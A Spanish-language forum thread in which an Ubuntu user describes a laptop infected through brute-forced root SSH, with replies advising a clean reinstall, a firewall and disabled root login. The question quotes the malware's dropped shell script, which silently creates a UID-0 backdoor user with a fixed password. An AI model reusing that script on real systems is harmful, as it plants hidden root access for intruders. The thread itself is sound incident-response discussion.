¿Cómo lidiar con el malware en mi computadora portátil?

12

Estoy bastante seguro de que mi computadora portátil Ubuntu 13.10 está infectada con algún tipo de malware.

De vez en cuando, encuentro un proceso / lib / sshd (propiedad de root) que se ejecuta y consume mucha CPU. No es el servidor sshd el que ejecuta / usr / sbin / sshd.

El binario tiene permisos --wxrw-rwt y genera y genera scripts en el directorio / lib. Una reciente se llama 13959730401387633604 y hace lo siguiente

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

El usuario de gusr fue creado por el malware de forma independiente, y luego chpasswd se cuelga mientras consume 100% de CPU.

Hasta ahora, he identificado que el usuario de gusr se agregó adicionalmente a los archivos en / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Parece que el malware hizo copias de todos estos archivos con el sufijo "-". La lista completa de archivos / etc / que fueron modificados por root está disponible aquí .

Además, el archivo / etc / hosts se cambió a este .

¡El / lib / sshd comienza agregándose al final del archivo /etc/init.d/rc.local!

Eliminé al usuario, eliminé los archivos, eliminé el árbol de procesado, cambié mis contraseñas y eliminé las claves públicas ssh.

Soy consciente de que básicamente estoy jodido, y lo más probable es que reinstale todo el sistema. Sin embargo, dado que inicio sesión en varias otras máquinas, sería bueno al menos intentar eliminarlo y descubrir cómo lo obtuve. Cualquier sugerencia sobre cómo hacer esto sería apreciada.

Parece que llegaron el 25 de marzo mediante el inicio de sesión de root de fuerza bruta. No tenía idea de que root ssh está habilitado por defecto en Ubuntu. Lo deshabilité y coloqué denyhosts.

El inicio de sesión fue de 59.188.247.236, aparentemente en algún lugar de Hong Kong.

Obtuve la computadora portátil de EmperorLinux, y habilitaron el acceso de root. Si tienes uno de esos y estás ejecutando sshd ten cuidado.

security malware Dejan Jovanović
fuente
2
¡Apague su máquina de la red! ¡Ahora!
Seth
2
¿Y por qué tiene habilitado el inicio de sesión raíz? Eso es algo que no deberías habilitar sin una buena razón.
Seth
@Seth No lo habilité, estaba activado por defecto en Ubuntu. Estoy tan sorprendido como tu.
Dejan Jovanović
1
Consulte " De forma predeterminada, el demonio SSH se entrega con inicios de sesión raíz remotos habilitados. Normalmente Ubuntu no permite el acceso directo al usuario raíz, por lo que esta configuración no es importante. Si ha establecido una contraseña en la cuenta raíz, esta configuración puede ser una posibilidad riesgo de seguridad, y debe ser desactivado. "
Seth
1
Estoy bastante seguro de que esto no es así Linux/Ebury. Es otra cosa, y posiblemente no tenga un nombre asignado. Ebury no crearía una nueva cuenta de usuario, y habría modificado la biblioteca compartida utilizada por openssh, no se ha eliminado en un nuevo binario llamado sshd.
Riking

Respuestas:

11

Primero, ¡saque esa máquina de la red ahora!

En segundo lugar, ¿por qué habilitó la cuenta raíz? Realmente no debe habilitar la cuenta raíz a menos que tenga una muy buena razón para hacerlo.

En tercer lugar, sí, la única forma de asegurarse de que está limpio es realizar una instalación limpia. También se recomienda que comience de nuevo y no regrese a una copia de seguridad, ya que nunca puede estar seguro de cuándo comenzó todo.

También sugiero que configure un firewall en su próxima instalación y rechace todas las conexiones entrantes: 

sudo ufw default deny incoming

y luego permita ssh con: 

sudo ufw allow ssh

¡y NO habilite la cuenta raíz! Ciertamente asegúrese de que el inicio de sesión ssh raíz esté deshabilitado.

Seth
fuente
44
Revisé la cuenta raíz. Obtuve el portátil de Emperorlinux y habilitaron la cuenta para configurarlo. Estúpido.
Dejan Jovanović
1
@ DejanJovanović ¡Eso es terrible!
Seth